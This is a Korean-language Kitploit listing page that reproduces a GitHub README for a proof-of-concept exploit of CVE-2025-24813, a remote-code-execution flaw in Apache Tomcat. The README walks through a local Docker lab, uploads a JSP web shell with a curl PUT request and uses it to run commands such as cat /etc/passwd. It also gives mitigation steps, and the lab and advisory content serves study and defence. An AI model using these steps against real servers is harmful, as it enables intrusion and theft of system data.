Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24813 — Apache Tomcat PUT JSP RCE - CVE-2025-24813 - 익스플로잇 & PoC | Kitploit
도구/GitHubGitHub/shivshantp/cve-2025-24813
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingPayload DevelopmentLabs & Practice
GitHubshivshantp/cve-2025-24813

CVE-2025-24813

Apache Tomcat PUT JSP RCE - CVE-2025-24813 - 익스플로잇 & PoC

저장소 보기
581년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE 익스플로잇

CVE Exploit-Status Platform Language Dockerized License

이 저장소는 HTTP PUT 메서드를 사용하여 악성 JSP 웹 셸을 배포함으로써 Apache Tomcat에서 원격 코드 실행(RCE)을 유발하는 CVE-2025-24813에 대한 완전한 개념 증명(PoC)을 포함합니다.

🔥 이 익스플로잇은 제대로 보안이 설정되지 않은 Tomcat 인스턴스에서 파일 업로드 및 페이로드 실행을 통해 공격자가 RCE를 달성할 수 있는 방법을 시연합니다.


📁 프로젝트 구조

root@kitploit:~
CVE-2025-24813/
├── docker/                         
│   ├── Dockerfile
│   └── web.xml                    
├── exploit/                        
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/                    
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md

🚀 익스플로잇 단계

1️⃣ Docker 환경 설정

root@kitploit:~
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat

📸 Tomcat 실행 중
📸 Docker 시작됨


2️⃣ 악성 JSP 셸 업로드

root@kitploit:~
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp

📸 JSP 업로드


3️⃣ Python 익스플로잇 실행

root@kitploit:~
python3 exploit/1_exploit_cve_2025_24813.py

📸 익스플로잇 실행


4️⃣ 웹 셸 사용하기

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd

📸 whoami
📸 passwd
📸 uname
📸 id
📸 pwd


🧩 기능

  • 🔧 취약한 Apache Tomcat 서버의 Docker 기반 설정
  • 📥 PUT 메서드를 악용하여 JSP 웹 셸 업로드 및 트리거
  • 🐍 Python 기반 PoC 스크립트
  • 📸 전체 스크린샷 기반 실습 가이드
  • 📚 레드 팀 시뮬레이션 및 교육에 적합

🛠️ 패치 방법 (완화 조치)

  • 🚫 web.xml 또는 서버 구성에서 PUT/DELETE 메서드 비활성화
  • ⛓️ 보안 관리자 또는 더 엄격한 서블릿 컨테이너 제어 사용
  • 🔐 파일 수준 업로드 필터 및 검증 적용
  • 🧱 승인되지 않은 PUT 요청을 차단하도록 WAF 설정
  • ✅ Apache Tomcat의 보안 패치 버전으로 업그레이드

⚠️ 면책 조항

이 프로젝트는 교육 및 연구 목적으로만 제공됩니다. 소유하지 않았거나 테스트 권한이 없는 시스템에 대한 무단 테스트, 악용 또는 사용은 불법이며 비윤리적입니다.


👨‍💻 작성자

Shivshant Patil
공인 윤리적 해커 (CEH v13)
컴퓨터 공학 B.Tech 졸업
🔗 LinkedIn
🔗 GitHub

도구 다운로드